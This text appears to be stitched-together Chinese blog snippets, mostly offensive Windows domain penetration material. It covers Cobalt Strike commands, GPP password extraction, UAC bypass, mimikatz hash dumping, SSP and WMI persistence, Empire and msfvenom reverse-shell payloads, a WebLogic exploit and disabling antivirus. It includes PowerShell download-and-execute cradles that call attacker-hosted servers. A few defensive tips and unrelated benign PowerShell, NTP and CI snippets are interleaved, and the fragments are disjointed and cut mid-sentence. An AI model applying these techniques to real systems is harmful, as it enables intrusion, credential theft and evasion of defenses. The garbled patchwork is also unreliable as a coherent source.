Executable:生成32位或64位的exe、dll可执行文件 5.Windows Executable(S):用于生成一个exe可执行文件,包含Beacon的完整payload,与4相比,该模块额外提供了代理功能...并且支持Powershell脚本,用于将Stageless Payload注入内存。 复制 4.远控进行vnc,文件管理,进程查看等一系列操作。...执行命令 powershell 通过powershell.exe执行命令 powershell-import 导入powershell脚本...使用服务在主机上生成会话 psexec_psh 使用PowerShell在主机上生成会话 psinject 在特定进程中执行... wmi 使用WMI在主机上生成会话 复制 (4)其他: 这里仅仅介绍了CobaltStrike工具的一小部分功能,CobaltStrike是一款非常强大的远控工具
组策略的发展 域环境下密码难题 在Windows server 2003中,想要批量修改域内主机本地管理员密码,常常通过配置组策略执行vbs脚本的方式,贴三好学生大佬的代码: strComputer =...vbs脚本,也就能够获取脚本中保存的明文密码。...SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。...其中GPP最有用的特性,是在某些场景存储和使用凭据,其中包括: 映射驱动(Drives.xml)创建本地用户数据源(DataSources.xml)打印机配置(Printers.xml)创建/更新服务(...Empire 在Empire框架下,我们可以usemodule privesc/gpp 组策略首选项提权的防御措施 在用于管理组策略的计算机上安装 KB2962486补丁,防止新的凭据被放置在组策略首选项中
使用Bypass UAC模块进行提权时,系统当前用户必须在管理员组,而且用户账户控制程序UAC设置为默认,即“仅在程序试图更改我的计算机时通知我”,而且Bypass UAC模块运行时会因为在目标机上创建多个文件而被杀毒软件识别...:>net time \127.0.0.25 #查时间 D:>at\127.0.0.25 10:50 srv.exe #用at命令在10点50分启动srv.exe(注意这里设置的时间要比主机时间快...PowerShell寻找域管在线服务器 Windows PowerShell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。...PowerShell还允许将几个命令组合起来放到文件里执行,实现文件级的重用,也就是说有脚本的性质。...整个渗透过程一环套一环,环环相扣。 有了域控的权限,接着来抓Hash,常用方法有以下几种。 — 使用Metasploit自带的dumphash或者smart_hashdump模块导出用户的Hash。
rb --dns "domain=pentest.com,host=192.168.1.32" --no-cache -e open Step 2:在目标主机上执行如下的代码: powershell...设置监听器 选择渗透测试模块(设置参数àrun/execute) 产生payload 最后把payload在目标机上执行 反弹shell 2.4.2 利用office宏定义反弹shell Step...2.4.4 Empire产生VBS木马反弹shell use stager windows/launcher_vbs execute 在靶机上运行该VBS脚本即可 ?...将生成的test文件复制到python搭建的web服务器中,于是有:http://192.168.1.18:9889/test step 3:在目标机上执行powershell下载脚本 powershell...执行run之后,会看到生成的powershell命令,复制出来,在目标机上执行 powershell.exe -nop -w hidden -c $h=new-object net.webclient;
,它们在域中所有的域控制器之间复制.Sysvol文件夹是安装AD时创建的,它用来存放GPO,脚本等信息。...设置每个人访问权限 不在组策略中使用域控密码 设置共享文件夹SYSVOL的访问权限 删除现有的GPP里包含密码的XML文件。...获取系统SAM文件等 使用VSS卷影副本(通过WMI或PowerShell的远程处理)远程提取NTDS.DIT 窗口有一个名为WMI的内置管理组件,支持远程执行(需要管理员权限).WMIC是在远程计算机上执行命令的...组策略默认情况下每90分钟(域控制器5分钟)可包括安全选项,注册表项,软件安装以及启动和关闭脚本以及域成员刷新组策略设置。这意味着组策略在目标计算机上执行配置的设置。...其实我认为组策略也相当于远控,可以把配置脚本让域内的每一台电脑都种上马批量执行一遍。 或者每周在所有域上运行Mimikatz获取明文密码,以及获取某种类型文件这要通过编写脚本实现。
杀死一个后台计价器脚本 bglist 列出正在运行的后台脚本 bgrun 以后台线程的形式执行抄表器脚本 ...在目标上列出驱动器 elevate 在升高的上下文中生成一个会话 execute 在目标机上执行程序(...在远程主机上生成一个会话 kerberos_ccache_use 将缓存中的 kerberos ticket 应用到这个会话中。...powershellimport 导入一个powershell脚本 ppid 为生成的postex作业设置父级PID...ssh 使用SSH在主机上生成一个SSH会话。
2.实验操作 1.在域控上运行mimikatz,分别读取域用户的NTLM hash和本地管理员的NTLM hash8.3.2 SSP维持域控权限 读域用户 privilege::debug lsadump...1.实验操作 实验环境:server2007 域主机 win7 1.添加ssp 将mimilib.dll复制到域控c:\windows\system32下 2、设置SSP 修改域控注册表位置: 3....HTTP-Backdoor脚本 此脚本可以帮助攻击者在目标主机上下载和执行Powershell脚本,接收来自第三方网站的指令,在内存中执行PowerShell脚本,其语法如下。...如果该地址存在,Magistring中的值就会执行Payload,下载并运行攻击者的脚本。-PayloadURL: 给出需要下载的PowerShell脚本的地址。...Execute-OnTime脚本用于在目标主机上指定PowerShell脚本的执行时间,与HTTP-Backdoor脚本的使用方法相似,只不过增加了定时功能,其语法如下。
感恩这一年相识、相知、相趣的安全大佬和朋友们,如果写得不好或不足之处,还请大家海涵!...一旦攻击者可以在一台计算机上运行代码,就会下载PowerShell脚本文件(.ps1)到磁盘中执行,甚至无须写到磁盘中执行,它就可以直接在内存中运行。...各Windows操作系统的PowerShell版本如下: 一旦攻击者在一台计算机上运行代码,他们就会下载PowerShell脚本文件(.ps1)到磁盘中执行,甚至无须写道磁盘中执行,就可以直接在内存中运行...通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。...注入文件如下图所示: 第二步,在目标机上下载脚本,输入以下命令。
同样的为了实现PowerShell脚本的保存、方面在别的服务器迁移,一般都是先编写脚本,然后通过脚本文件执行完成相应的运维任务。...首先打开 WindowPowerShell ISE 开发环境新建一个test.ps1,脚本内容如下:$arr1=1..10 #定义一个1~10的数组 $arr1 #打印数组一、四种执行方式介绍1、当前文件夹运行命令进入存放脚本文件的命令...命令格式:PowerShell ps1脚本文件完整路径4、通过Windows计划任务执行PowerShell脚本PowerShell 脚本默认无法执行,需要先修改 PowerShell 执行策略(ExecutionPolicy...切换到操作选项卡,新建操作设置执行脚本文件powershell添加参数 F:\桌面\test.ps1然后就可以正常运行该计划了。...3、 脚本编写效率大大提高。交互执行的方式会存在脚本思维的跳跃。不利于脚本整体逻辑的把控。4、 定时任务的实现。通过脚本方式可以很方便的脚本文件周期重复性执行,这样就达到了定时任务的目的。
在域控上执行下面这个脚本以确保域控制器本身的时间跟北京时间同步,脚本里ntpserver配置的是腾讯云的time1.tencentyun.com到time5.tencentyun.com,也可以配置ntpupdate.tencentyun.com...\Servers 执行脚本后验证效果,powershell执行restart-service w32time、w32tm /query /source、w32tm /query /peers w32tm...4、域内成员同步策略(在域成员机上操作) 组策略配好后,先在域控机器上powershell执行restart-service w32time,然后在域成员机上powershell执行gpupdate /...如果没搜到"时间服务",注意在域控上看下是否忘记执行下图这个动作了,在域控上执行dsa.msc把入域的成员机拉入到新建的组织单位里,然后在成员机上重新执行 gpupdate /force;restart-service...,然后再执行gpupdate /force,如果执行报下面的错了, 再次在域控上powershell执行restart-service w32time,然后在域成员机再次执行gpupdate /force
#Powershellery/Stable-ish/Get-SPN/ 下Get-SPN.psm1脚本的使用,需要powershell3.0及以上版本才能使用 Import-Module ....某些功能需要管理员权限 netsess.exe netsess.exe的原理也是调用NetSessionEnum API,并且在远程主机上无需管理员权限。...可以借助这个脚本对域控制器进行扫描 smb-enum-shares.nse遍历远程主机的共享目录 smb-enum-processes.nse通过smb对主机的系统进程进行遍历,通过这些信息,可以知道目标主机上运行软件信息...如果域控运行这打印机服务,那么我们可以直接将MS-RPRN请求RpcRemoteFindFirstPrinterChangeNotification(Kerberos身份验证)发送到DC的打印服务器...更近一步,如果我们实现以下操作: 修改主机A的组策略,设置为自动发送当前用户的凭据 在主机A上面实现服务端的功能,接收主机A自己发送的请求 我们同样能够获得用户的明文口令。
找遍全网,我找到了如下解决方法:去 exploit-db 下载这个exploit脚本,然后攻击者使用如下命令生成一个powershell格式的木马: msfvenom -p windows/x64/meterpreter...然后将刚下载的exploit脚本中的exploit变量替换为生成的shell.ps1脚本中的内容。...然后在msfconsole中设置好监听: image-20210119160020256 然后执行exploit脚本: python3 exploit.py http://192.168.1.8:7001...在WEB主机上用mimikatz抓一下域用户的密码,为了能绕过360,我们要对mimikatz进行免杀,使用Tide安全团队的系列文章《远控免杀专题》中的msf加载bin的方法,需要用到 Donut 和...在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马: $com = [Type]::GetTypeFromCLSID('9BA05972
运行gpedit.msc进入本地组策略,通过Windows设置的“脚本(启动/关机)”项来说实现。...容易遇到的问题:脚本需全路径,如 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 0x03 计划任务 通过window系统的任务计划程序功能实现定时启动某个任务...计划脚本每 1 分钟运行一次。 ? 0x04 服务自启动 通过服务设置自启动,结合powershell实现无文件后门。...0x05 WMI后门 在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的WMI。...这种方法可以绕过Autoruns对启动项的检测。 ? 0x08 远程控制 远控木马是一种恶意程序,其中包括在目标计算机上用于管理控制的后门。
组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。组策略的其中一个版本名为本地组策略(缩写“LGPO”或“LocalGPO”),这可以在独立且非域的计算机上管理组策略对象。...通过使用组策略,你可以设置策略设置一次,然后将该设置复制到多台计算机上。...例如,你可以在链接到域的 GPO 中设置多个 Internet Explorer11 安全设置,然后将所有这些设置应用到域中的每台计算机。...SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。...此外,域控机器之间因为要自动同步域数据,SYSVOL文档允许该域内的所有DC机之间进行复制,并且所有的AD用户都可以访问它 在域中,用户登录(计算机)时,会首先在SYSVOL文件查找GPO和启动脚本。
组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。组策略的其中一个版本名为本地组策略(缩写“LGPO”或“LocalGPO”),这可以在独立且非域的计算机上管理组策略对象。...通过使用组策略,你可以设置策略设置一次,然后将该设置复制到多台计算机上。...例如,你可以在链接到域的 GPO 中设置多个 Internet Explorer11安全设置,然后将所有这些设置应用到域中的每台计算机。...SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。...此外,域控机器之间因为要自动同步域数据,SYSVOL文档允许该域内的所有DC机之间进行复制,并且所有的AD用户都可以访问它 在域中,用户登录(计算机)时,会首先在SYSVOL文件查找GPO和启动脚本。
在“隐藏者”象限中,其中尤其关注的技术有“T1059命令与脚本解释器利用”、“T1003操作系统凭证转储”、“T1505服务器软件组件利用”,其中T1059中需要重点关注的子技有“PowerShell利用...对于上述技术的检测,我们建议以终端EDR检测为主,以流量层威胁监测为辅的思路进行联动检测,该部分主机层的安全设备更具有优势,而流量层监测设备则能够结合主机告警进行追踪溯源,在流量层进行宏观的把控,以供云端专家对其发展态势发展作出预判...3、PowerShell利用 PowerShell是Windows操作系统中自带的功能强大的交互式命令行界面和脚本环境。攻击者可以使用PowerShell执行许多操作,包括信息探测和执行代码。...脚本,最终释放远控木马到C:\Windows\SysWOW64\rmnlik.exe目录下,上线连接C2服务器地址。...在这里PowerShell是一个下载器,仅为中间的一环(其他环节也已经暴露),为了规避检测,进行代码混淆,下图为流量层沙箱对PowerShell恶意脚本的检测,基本上确定了其脚本的行为。 ?
脚本宿主引擎可用作另一种命令和控制方法,在2017年拉斯维加斯Bsides展出,并发布了一个工具来协助此活动。...Windows 2000到Windows 10的多个Windows环境中使用,也可以在没有PowerShell的旧系统或者运行旧版本的ASP.NET中使用,因此与基于PowerShell的其他工具相比,...免杀操作 下一步是杀死windows defender和所有其他正在运行的防病毒软件,以确保我们可以在目标计算机上执行任何我们想要执行的命令,你只需简单的运行以下命令即可: use implant/manage...不过这看着确实有点傻,因为傻到这种程度的人估计也是稀有"产品"~ 其他操作 当然Koadic还有很多很多强大的地方,例如文件上传、注册表权限维持、获取域控的hashdump、BypassUAC、枚举域信息...、枚举域内打印机信息等等,这里就不再逐一介绍了~ ?
一旦攻击者可以在一台计算机上运行代码,他们便可以下载powershell脚本文件(.ps1)到磁盘执行,脚本可以在内存中运行(无文件化)。...2.4.4 Empire产生VBS木马反弹shell use stager windows/launcher_vbs execute 在靶机上运行该VBS脚本即可 注意:如果要生成基于VBS的Powershell...python搭建的web服务器中,于是有:http://192.168.1.18:9889/test step 3:在目标机上执行powershell下载脚本 powershell IEX (New-Object.../test.dll 接着将生成好的DLL文件复制python服务器中,于是有:http://192.168.1.18:9889/pentest.dll,然后在目标机上下载该文件到C盘 在目标机上启动一个进程进行...,会看到生成的powershell命令,复制出来,在目标机上执行 powershell.exe -nop -w hidden -c $h=new-object net.webclient;$h.proxy
CI 安装示例 此部分介绍了如何使用 PowerShell 或 bash 脚本进行手动安装,同时还介绍了多个服务型软件 (SaaS) CI 解决方案。...如果使用与所列不同的 SaaS 解决方案,或需要超越预封装支持范围的自定义设置,至少必须执行一些手动配置。 一般来说,手动安装需要获取一个版本的工具(或最新每日版工具),再运行生成脚本。...可以使用 PowerShell 或 bash 脚本安排 .NET 命令,也可以使用概述生成进程的项目文件。 业务流程部分详细介绍了这些选项。...创建执行手动 CI 生成服务器安装的脚本后,在开发计算机上使用它来生成本地代码以供测试。 确认此脚本可以在本地正常运行后,将它部署到 CI 生成服务器。...下面是一相对简单的 PowerShell 脚本,说明了如何获取 .NET SDK,以及如何将它安装到 Windows 生成服务器上:
领取专属 10元无门槛券
手把手带您无忧上云